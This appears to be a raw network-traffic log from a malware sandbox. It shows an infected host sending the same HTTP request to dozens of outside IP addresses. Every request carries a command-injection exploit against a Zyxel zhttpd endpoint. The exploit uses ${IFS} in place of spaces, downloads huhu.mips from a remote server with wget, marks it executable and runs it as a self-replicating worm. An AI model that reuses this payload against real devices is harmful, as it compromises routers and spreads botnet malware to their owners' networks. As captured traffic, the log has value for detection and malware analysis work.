                                              Jan 29, 2024 07:03:39.800952911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1922192.168.2.1447930120.8.208.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800973892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1923192.168.2.1444848172.247.98.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801006079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1924192.168.2.145264423.244.156.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801063061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1925192.168.2.1435328151.109.139.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801096916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1926192.168.2.145061443.164.100.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801126957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1927192.168.2.1437372157.141.180.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801172972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1928192.168.2.1436252103.35.66.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801192045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1929192.168.2.1455986105.83.63.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801235914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1930192.168.2.1455734171.14.87.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801286936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1931192.168.2.1452812153.78.201.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801304102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1932192.168.2.1452398111.155.131.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801332951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1933192.168.2.144011013.238.33.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801403999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1934192.168.2.1445476196.86.135.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801426888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1935192.168.2.145909271.76.82.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801454067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1936192.168.2.1450704196.45.34.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801491976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1937192.168.2.14405861.137.109.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801553011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1938192.168.2.145641852.250.40.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801565886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1939192.168.2.145862661.44.20.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801600933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1940192.168.2.1445452203.10.5.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801645994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1941192.168.2.1448324121.179.57.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801670074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1942192.168.2.1434258107.213.197.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801703930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1943192.168.2.145986425.181.169.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801755905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1944192.168.2.1443184123.37.223.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801793098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1945192.168.2.144260637.112.236.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801846981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1946192.168.2.1444312173.117.40.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801862001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1947192.168.2.144962454.104.172.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801903963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1948192.168.2.145693457.88.241.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801923990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1949192.168.2.144459457.100.120.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.801995039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1950192.168.2.1456550207.214.147.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802011967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1951192.168.2.1456378169.16.60.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802086115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1952192.168.2.1458034136.32.30.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802125931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1953192.168.2.145693825.43.247.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802145004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1954192.168.2.143669653.44.235.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802170038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1955192.168.2.145078640.226.133.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802212954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1956192.168.2.1455632100.139.207.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802262068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1957192.168.2.144385483.73.28.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802288055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1958192.168.2.1435612116.153.169.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802352905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1959192.168.2.144725657.168.243.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802371979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1960192.168.2.143957813.58.6.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802406073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1961192.168.2.1445998159.226.163.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802438974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1962192.168.2.145095279.41.48.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802464962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1963192.168.2.145208488.86.55.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802540064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1964192.168.2.14418328.186.32.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802565098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1965192.168.2.143627297.237.236.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802592039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1966192.168.2.1448784120.108.151.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802634001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1967192.168.2.1446012162.94.113.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802676916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1968192.168.2.144777424.78.223.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802710056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1969192.168.2.1449666186.215.34.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802741051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1970192.168.2.1456180193.79.113.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802789927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1971192.168.2.1455822118.12.231.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802822113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1972192.168.2.1441762103.137.210.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802877903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1973192.168.2.143438091.115.14.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802922010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1974192.168.2.145800077.49.37.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802953005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1975192.168.2.143775692.173.191.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.802978039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1976192.168.2.1450280203.16.107.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803025007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1977192.168.2.1457444117.167.211.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803069115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1978192.168.2.1458828129.246.112.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803102970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1979192.168.2.1451372213.99.229.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803149939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1980192.168.2.145548672.29.166.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803184986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1981192.168.2.1460182208.230.132.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803231955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1982192.168.2.1456916173.217.8.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803291082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1983192.168.2.145257617.242.183.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803316116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1984192.168.2.1454028116.112.155.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803347111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1985192.168.2.1460312139.146.29.254443
                                              TimestampBytes transferredDirectionData
